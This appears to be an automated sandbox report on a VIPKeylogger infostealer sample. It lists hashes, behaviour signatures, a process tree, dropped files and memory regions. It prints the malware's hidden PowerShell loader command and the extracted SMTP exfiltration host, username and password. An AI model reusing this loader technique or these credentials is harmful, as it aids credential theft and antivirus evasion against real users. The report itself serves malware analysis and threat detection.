Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/01/2025, 02:04

General

  • Target

    07999ec3c7658c8a44b81c24bc6b9ede3e923bbb90496e7d99cc6558e3d470b4.exe

  • Size

    880KB

  • MD5

    bc9ff7c64532238a148f394bfe4880be

  • SHA1

    c90b254fc30b0da39b1b9102bb66b577da9b4045

  • SHA256

    07999ec3c7658c8a44b81c24bc6b9ede3e923bbb90496e7d99cc6558e3d470b4

  • SHA512

    746881467817fed1d2d4cc136cadb14a8dcee2fbe0b18e4083bcb719ce9470d9d5b7fb02f0617befd8593e89ddecc0f7cdae6f97705b256d50b4ef88844e8f99

  • SSDEEP

    24576:OPX04T0HUUGu8JZ3flmaIuYgxEJisWHbJrz5ACBv5:OnWYR7lkgEyl7

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.badrsystem.store
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    STARBOI1234567890147

Extracted

Family

vipkeylogger

Credentials

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\07999ec3c7658c8a44b81c24bc6b9ede3e923bbb90496e7d99cc6558e3d470b4.exe
    "C:\Users\Admin\AppData\Local\Temp\07999ec3c7658c8a44b81c24bc6b9ede3e923bbb90496e7d99cc6558e3d470b4.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3284
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Sregne=gc -raw 'C:\Users\Admin\AppData\Local\faculative\bladanen\budges\Antichronical\Cocottes.Fib';$Aptera=$Sregne.SubString(13045,3);.$Aptera($Sregne) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Modifies Windows Defender DisableAntiSpyware settings
        • Accesses Microsoft Outlook profiles
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:4856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bvqkeskw.0zz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\nsp9200.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    fa299e199922b3ba833be655a8d71b75

    SHA1

    4d74c53bb6927a2831df93af26f3e4e4fb007797

    SHA256

    49a6a1c1f19574b2a247ce6c5adc0751e046d27c30912816ba415f871b74ae5d

    SHA512

    7ceb64d3d826762994c48ffad3ad2234410cbcdbedfce9a2dc03d18915ce22d687173f90e954d7bdb0eae76954c360059ad761aedc48cd7fa4ec29d6094f6a65

  • C:\Users\Admin\AppData\Local\faculative\bladanen\budges\Antichronical\Cocottes.Fib

    Filesize

    74KB

    MD5

    c2cb350a7e0a63cabca908ca2b41b0f1

    SHA1

    b25bd63f069ef8568793f412069b69759c3f5b73

    SHA256

    55bf96b2bb3c5ae8b1f598de978cacf101872fcadc022f303e0630f66f900b68

    SHA512

    4b30e660f7ea800480283c02ee605d32430ce2e58b4a4c780e369c9462477483dce264334239dd5271a47c291b7f208800155e72cec44157a4bfcda940fe7479

  • C:\Users\Admin\AppData\Local\faculative\bladanen\budges\Antichronical\Orthotist.Var

    Filesize

    303KB

    MD5

    491b22fa77ef54820c4a165ac9fbcb09

    SHA1

    8415da474e565b1b04e95d04b6a1e01d3d2aad2b

    SHA256

    29828118d7a5f1aadbe28a4af123e02acc49298cefae7146e8029b57062591cf

    SHA512

    98bc256abf4f7f2180019aee3843d6db9ccf25c4f0d0dd2d1f446b1c6ff31e0504b4b9e86bfb1df0dbf740cc410d640fe726888b25d6593b146b906ae1906c91

  • memory/2696-30-0x00000000741FE000-0x00000000741FF000-memory.dmp

    Filesize

    4KB

  • memory/2696-31-0x0000000002870000-0x00000000028A6000-memory.dmp

    Filesize

    216KB

  • memory/2696-32-0x0000000005120000-0x0000000005748000-memory.dmp

    Filesize

    6.2MB

  • memory/2696-33-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-34-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-35-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

    Filesize

    136KB

  • memory/2696-37-0x0000000005830000-0x0000000005896000-memory.dmp

    Filesize

    408KB

  • memory/2696-36-0x00000000057C0000-0x0000000005826000-memory.dmp

    Filesize

    408KB

  • memory/2696-47-0x00000000058A0000-0x0000000005BF4000-memory.dmp

    Filesize

    3.3MB

  • memory/2696-49-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

    Filesize

    304KB

  • memory/2696-48-0x0000000005E40000-0x0000000005E5E000-memory.dmp

    Filesize

    120KB

  • memory/2696-50-0x00000000063B0000-0x0000000006446000-memory.dmp

    Filesize

    600KB

  • memory/2696-51-0x0000000006370000-0x000000000638A000-memory.dmp

    Filesize

    104KB

  • memory/2696-52-0x0000000006450000-0x0000000006472000-memory.dmp

    Filesize

    136KB

  • memory/2696-53-0x00000000076B0000-0x0000000007C54000-memory.dmp

    Filesize

    5.6MB

  • memory/2696-55-0x00000000082E0000-0x000000000895A000-memory.dmp

    Filesize

    6.5MB

  • memory/2696-57-0x0000000070670000-0x00000000706BC000-memory.dmp

    Filesize

    304KB

  • memory/2696-56-0x0000000007250000-0x0000000007282000-memory.dmp

    Filesize

    200KB

  • memory/2696-67-0x0000000007290000-0x00000000072AE000-memory.dmp

    Filesize

    120KB

  • memory/2696-69-0x00000000072C0000-0x0000000007363000-memory.dmp

    Filesize

    652KB

  • memory/2696-68-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-70-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-71-0x00000000073C0000-0x00000000073CA000-memory.dmp

    Filesize

    40KB

  • memory/2696-72-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-73-0x0000000007520000-0x0000000007531000-memory.dmp

    Filesize

    68KB

  • memory/2696-74-0x0000000007560000-0x000000000756E000-memory.dmp

    Filesize

    56KB

  • memory/2696-75-0x0000000007570000-0x0000000007584000-memory.dmp

    Filesize

    80KB

  • memory/2696-76-0x00000000075D0000-0x00000000075EA000-memory.dmp

    Filesize

    104KB

  • memory/2696-77-0x00000000075A0000-0x00000000075A8000-memory.dmp

    Filesize

    32KB

  • memory/2696-78-0x0000000007610000-0x000000000763A000-memory.dmp

    Filesize

    168KB

  • memory/2696-79-0x0000000007640000-0x0000000007664000-memory.dmp

    Filesize

    144KB

  • memory/2696-80-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-83-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-82-0x00000000741FE000-0x00000000741FF000-memory.dmp

    Filesize

    4KB

  • memory/2696-84-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-86-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-87-0x0000000008960000-0x0000000009500000-memory.dmp

    Filesize

    11.6MB

  • memory/2696-88-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-89-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-90-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-92-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/2696-93-0x00000000741F0000-0x00000000749A0000-memory.dmp

    Filesize

    7.7MB

  • memory/4856-94-0x0000000001AE0000-0x0000000002680000-memory.dmp

    Filesize

    11.6MB

  • memory/4856-101-0x0000000000880000-0x0000000001AD4000-memory.dmp

    Filesize

    18.3MB

  • memory/4856-102-0x0000000000880000-0x00000000008CA000-memory.dmp

    Filesize

    296KB

  • memory/4856-103-0x0000000020590000-0x000000002062C000-memory.dmp

    Filesize

    624KB

  • memory/4856-105-0x0000000001AE0000-0x0000000002680000-memory.dmp

    Filesize

    11.6MB

  • memory/4856-106-0x0000000021170000-0x0000000021202000-memory.dmp

    Filesize

    584KB

  • memory/4856-108-0x00000000213E0000-0x00000000215A2000-memory.dmp

    Filesize

    1.8MB

  • memory/4856-109-0x0000000021210000-0x0000000021260000-memory.dmp

    Filesize

    320KB

  • memory/4856-110-0x0000000021AE0000-0x000000002200C000-memory.dmp

    Filesize

    5.2MB

  • memory/4856-112-0x00000000212C0000-0x00000000212CA000-memory.dmp

    Filesize

    40KB